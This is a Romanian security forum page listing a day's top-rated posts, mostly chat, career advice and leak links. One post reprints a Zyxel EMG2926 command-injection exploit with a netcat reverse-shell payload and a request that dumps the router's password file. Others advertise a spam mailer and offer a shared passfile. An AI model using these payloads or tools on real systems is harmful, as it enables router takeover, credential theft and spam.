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Showing content with the highest reputation on 04/04/17 in all areas

  1. Buna seara,ma numesc Alexandru,dar prietenii imi spun Alex asa ca decideti voi cum sa imi ziceti. Am 23 ani si sunt pasionat de multe activitati cateva dintre ele va voi spune cateva,pescuitul,condusul,fetele ,etc,am aflat de acest forum dupa un search pe "gogu" cautand diverse Dupa cum observ este un forum cu diversi oameni care au specializari diferite.Deoarece cochetez cu partea de web code ca un incepator,modific,adaug peste codul existent,dar imi place si partea de C++ sau Python,as dori cateva sfaturi sau o indrumare pentru a invata si a evolua in acest domeniu al programari si cine stie poate pe viitor imi schimb si locul de munca pentru unul in acest domeniu. Sunt un tip OK,sunt de treaba,dar sunt si un om dusmanos daca ma vorbesti pe la spate. Cunosc limba engleza,un pic de spaniola si vreau sa invat limba rusa mai bine ca engleza. Ma bucur sa fiu printre voi si poate sentimentul este reciproc.Numai bine.
    2 points
  2. https://wikileaks.org/vault7/#Marble Framework Today, March 31st 2017, WikiLeaks releases Vault 7 "Marble" - 676 source code files for the CIA’s secret anti-forensic Marble Framework. https://wikileaks.org/vault7/#Dark Matter Today, March 23rd 2017, WikiLeaks releases Vault 7 "Dark Matter", which contains documentation for several CIA projects that infect Apple Mac Computer firmware. https://wikileaks.org/ciav7p1/ A series of leaks on the U.S. Central Intelligence Agency. Code-named "Vault 7" by WikiLeaks, it is the largest ever publication of confidential documents on the agency.
    2 points
  3. Flexibilitatea. https://github.com/yuanhui-yang/Cracking-the-Coding-Interview/blob/master/Cracking the Coding Interview - 4th Edition.pdf Pasaj din carte: "Pop Divas Need Not Apply Leonard was a very promising C++ coder, three years out of college, with a solid work history and an impressive skill set He proved on the phone screen that he was above-average technically, and so he was invited in for an interview We needed a savvy C++ person to work on a piece of middleware that interfaced with our database, and Leonard seemed like a sure fit However, once we started talking to him, things went south in a hurry He spent most of the interview criticizing every tool and platform that we questioned him on We used SQL Server as our database? Puhleease We were planning to switch to Oracle soon, right? What’s that? Our team used Tool A to do all our coding in? Unacceptable He used Tool B, and only Tool B, and after he was hired, we'd all have to switch to Tool B And we'd have to switch to Java, because he really wanted to work with Java, despite the fact that 75 percent of the codebase would have to be rewritten We'd thank him later And oh, by the way, he wouldn’t be making any meetings before ten o'clock Needless to say, we encouraged Leonard to seek opportunities elsewhere It wasn’t that his ideas were bad – in fact, he was “technically” right about many things, and his (strong) opinions were all backed with solid fact and sound reason (except for the ten o'clock thing – we think he may have just been making a “power play” ) But it was obvious that, if hired, Leonard wasn’t going to play well with others – he would have been toxic kryptonite for team chemistry He actually managed to offend two of the team members during the forty-five minutes of his interview Leonard also made the mistake of assuming that Code Purity and Algorithm Beauty were always more important than a business deadline In the real world, there are always compromises to be made, and knowing how to work with the business analysts is just as important as knowing how to refactor a blob of code If Leonard would not have gotten along with other IT people, he definitely wouldn’t have gotten along with the business folks Maybe you can get away with hiring a Leonard if he’s one of the best ten coders in the world (he wasn’t) But he was the classic failure example for the “Would you have a beer with this guy?” test "
    2 points
  4. Am avut la munca azi o mica disputa despre ce e mai important la un programator "coding skills" sau "language knowledge". Eu la inceputurile mele credeam ca coding skills e sfant, intre timp mi-am schimbat parerea si o cunoastere in detaliu limbajului cu care lucrezi face mult, foarte mult si te poate scoate din multe cacaturi. Intr-un final nu ajungi sa lucrezi in cercetare ci in productie unde te lovesti de multe cacaturi. Concluziile dezbateri au fost : 1. coding skills - poti sa te adaptezi usor la orice limbaj; - exista stackoverflow si google, orice algoritm/problema probabil deja are o rezolvare; - gandesti prea abstract si nu poti sa te adaptezi la ceea ce cere clientul; - pierzi prea mult timp incercand sa obtii solutia cea mai optima; - debugging-ul de cele mai multe ori te omoara; 2. language knowledge: - debuggingul e floare la ureche ---> pierzi putin timp pe buguri; - esti axat prea mult pe un limbaj, tranzitia catre un alt limbaj e destul de grea; - poti folosi toate beneficiile pe care ti le ofera acel limbaj ---> timp mai putin, nu reinventezi roata; - esti mai flexibil in gandire; - solutia care merge e deobicei solutia care o accepti ---> respecti deadline-urile; Cum stau lucrurile din punctul vostru de vedere ?
    1 point
  5. 189,90lei , de asta am avut bani, am muncit la o spalatorie auto + depozit de lemne, carbuni - Daca castigam cat un preot (pomeni, colive, cutia milei) imi cumparam racheta de telefon .
    1 point
  6. De ce ai face root la un telefon de 200 lei ? Just asking ...
    1 point
  7. [Sursa: https://www.exploit-db.com/exploits/41782/?rss ] # Exploit Title: Zyxel, EMG2926 < V1.00(AAQT.4)b8 - OS Command Injection # Date: 2017-04-02 # Exploit Author: Fluffy Huffy (trevor Hough) # Vendor Homepage: www.zyxel.com # Version: EMG2926 - V1.00(AAQT.4)b8 # Tested on: linux # CVE : CVE-2017-6884 OS command injection vulnerability was discovered in a commonly used home router (zyxel - EMG2926 - V1.00(AAQT.4)b8). The vulnerability is located in the diagnostic tools specify the nslookup function. A malicious user may exploit numerous vectors to execute arbitrary commands on the router. Exploit (Reverse Shell);stok=redacted/expert/maintenance/diagnostic/nslookup?nslookup_button=nslookup_button& ping_ip=google.ca%20%3B%20nc%20192.168.0.189%204040%20-e%20/p Exploit (Dump Password File) Request GET /cgi-bin/luci/;stok=<Clipped>/expert/maintenance/diagnostic/nslookup?nslookup_button=nslookup_button&ping_ip=google.ca%3b%20cat%20/etc/passwd&server_ip= HTTP/1.1 Host: Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.110 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Referer:;stok=<Clipped>/expert/maintenance/diagnostic/nslookup Accept-Language: en-US,en;q=0.8 Cookie: csd=9; sysauth=<Clipped> Connection: close Response (Clipped) <textarea cols="80" rows="15" readonly="true">root:x:0:0:root:/root:/bin/ash daemon:*:1:1:daemon:/var:/bin/false ftp:*:55:55:ftp:/home/ftp:/bin/false network:*:101:101:network:/var:/bin/false nobody:*:65534:65534:nobody:/var:/bin/false supervisor:$1$RM8l7snU$KW2C58L2Ijt0th1ThR70q0:0:0:supervisor:/:/bin/ash admin:$1$<Clipped>:0:0:admin:/:/bin/fail
    1 point
  8. Vand grup pe facebook 17K+ membri nisa matrimoniale. Vechime 6 luni Zilnic sunt postate intre 10-20 de posturi ale membrilor Zilnic sunt peste 10-15 cereri de inscriere in grup. Pret 50$ plata btc !
    1 point
  9. daca vr iti dau eu passfile-ul meu , add me on skype fashion.play12 ( sry daca nu am voie sa imi dau id-ul de skype )
    1 point
  10. nu mai merge link download
    1 point
  11. Sa va iau la pula. Topicul este din 2014
    1 point
  12. New public notice on Iranian attackers starting to employ #Mac malware sourca : https://iranthreats.github.io/resources/macdownloader-macos-malware/
    1 point
  13. -1 points
  14. -1 points
  15. new Priv8 Mailer Inbox 2015 .message decode (base64,7bit,8bit,binary,quoted-printable) .subject decode ( =?utf-8?Q?subject?= ) .header decode .Text to Encrypt .Select Sender Name,Select Sender Email,Select Subject .Smtp .SSL Priv8 Mailer Inbox 2015 - Pastebin.com [/b][/center]
    -1 points
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